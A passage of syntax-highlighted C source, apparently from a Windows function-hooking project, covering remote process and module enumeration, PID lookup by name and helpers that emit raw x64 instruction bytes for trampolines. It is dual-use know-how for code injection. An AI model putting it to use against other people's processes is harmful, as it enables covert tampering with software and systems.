<span class="p">{</span>
<span class="kt">size_t</span> <span class="n">replacementLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">deviceDrive</span><span class="p">)</span> <span class="o">-</span> <span class="n">strlen</span><span class="p">(</span><span class="n">virtualDrivePrefix</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">rebasedPathLen</span> <span class="o">=</span> <span class="n">replacementLen</span> <span class="o">+</span> <span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o">-</span> <span class="mi">2</span><span class="p">;</span>
<span class="n">check</span><span class="p">(</span><span class="n">rebasedPathLen</span> <span class="o"><</span> <span class="n">outBuffSize</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">outBuff</span><span class="p">,</span> <span class="n">deviceDrive</span> <span class="o">+</span> <span class="n">strlen</span><span class="p">(</span><span class="n">virtualDrivePrefix</span><span class="p">),</span> <span class="n">replacementLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">outBuff</span> <span class="o">+</span> <span class="n">replacementLen</span><span class="p">,</span> <span class="o">&</span><span class="n">path</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o"><</span> <span class="n">outBuffSize</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">outBuff</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//returns the first module called "name" -> only searches for dll name, not whole path</span>
<span class="c1">//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"</span>
<span class="n">HMODULE</span> <span class="nf">FindModuleInProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lowerCaseName</span> <span class="o">=</span> <span class="n">_strdup</span><span class="p">(</span><span class="n">name</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">remoteProcessName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">MODULEINFO</span> <span class="n">remoteProcessModuleInfo</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is just the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">rebasedPath</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'\\'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">lastSlash</span><span class="p">)</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'/'</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">dllName</span> <span class="o">=</span> <span class="n">lastSlash</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">dllName</span><span class="p">,</span> <span class="n">lowerCaseName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">success</span> <span class="o">=</span> <span class="n">GetModuleInformation</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="o">&</span><span class="n">remoteProcessModuleInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MODULEINFO</span><span class="p">));</span>
<span class="n">check</span><span class="p">(</span><span class="n">success</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="n">remoteProcessModule</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">PrintModulesForProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is just the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">absoluteModuleName</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">HMODULE</span> <span class="nf">GetBaseModuleForProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">remoteProcessName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">MODULEINFO</span> <span class="n">remoteProcessModuleInfo</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is just the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">rebasedPath</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="n">RebaseVirtualDrivePath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">rebasedPath</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">rebasedPath</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="n">rebasedPath</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">success</span> <span class="o">=</span> <span class="n">GetModuleInformation</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="o">&</span><span class="n">remoteProcessModuleInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MODULEINFO</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error getting module information for remote process module</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">remoteProcessModule</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">FindPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">do</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteMovToRCX</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">val</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">()));</span>
<span class="kt">uint8_t</span> <span class="n">movAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into rcx</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">movAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">val</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">movAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">movAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">movAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteSaveArgumentRegisters</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">asmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x51</span><span class="p">,</span> <span class="c1">//push rcx</span>
<span class="mh">0x52</span><span class="p">,</span> <span class="c1">//push rdx</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="c1">//push r8</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x51</span><span class="p">,</span> <span class="c1">//push r9</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="c1">//sub rsp, 64 -> space for xmm registers</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="c1">// movups xmmword ptr [rsp],xmm0</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x4C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="c1">//movups xmmword ptr [rsp+10h],xmm1</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="c1">//movups xmmword ptr [rsp+20h],xmm2</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x30</span> <span class="c1">//movups xmmword ptr [rsp+30h],xmm3</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">asmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRestoreArgumentRegisters</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">asmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="c1">//movups xmm0,xmmword ptr[rsp]</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x4C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span><span class="c1">//movups xmm1,xmmword ptr[rsp + 10h]</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span><span class="c1">//movups xmm2,xmmword ptr[rsp + 20h]</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span><span class="c1">//movups xmm3,xmmword ptr[rsp + 30h]</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xC4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span><span class="c1">//add rsp,40h</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span><span class="c1">//pop r9</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x58</span><span class="p">,</span><span class="c1">//pop r8</span>
<span class="mh">0x5A</span><span class="p">,</span><span class="c1">//pop rdx</span>
<span class="mh">0x59</span> <span class="c1">//pop rcx</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">asmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAddRSP32</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">addAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xC4</span><span class="p">,</span> <span class="mh">0x20</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">addAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteSubRSP32</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">subAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0x20</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">subAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">subAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">subAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAbsoluteCall64</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">funcToCall</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">()));</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">funcToCall</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
